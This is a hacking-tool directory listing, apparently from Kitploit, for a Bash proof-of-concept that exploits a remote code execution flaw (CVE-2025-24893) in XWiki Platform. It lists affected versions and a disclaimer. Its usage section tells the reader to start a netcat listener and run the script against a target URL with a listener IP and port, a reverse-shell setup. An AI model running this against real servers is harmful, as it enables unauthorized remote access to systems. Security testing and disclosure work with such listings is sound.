Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24893 — Bash POC script for RCE vulnerability in XWiki Platform | Kitploit
Tools/GitHubGitHub/mah4nzfr/cve-2025-24893
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmah4nzfr/cve-2025-24893

CVE-2025-24893

Bash POC script for RCE vulnerability in XWiki Platform

View Repository
11 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-24893

Bash POC script for RCE vulnerability in XWiki Platform

Example usage:

Setup a netcat listener:

root@kitploit:~
$ nc -nvlp <Port>

Then run the script:

root@kitploit:~
$ chmod +x cve.sh
$ ./cve.sh <Target URL> <Listener IP> <Port>

Affected versions:

  • From 5.4 up to 15.10.11
  • From 16.0.0 up to 16.4.1

Disclamer

This tool is for educational purposes only. I hold no responsibility for any misuse.

Download Tool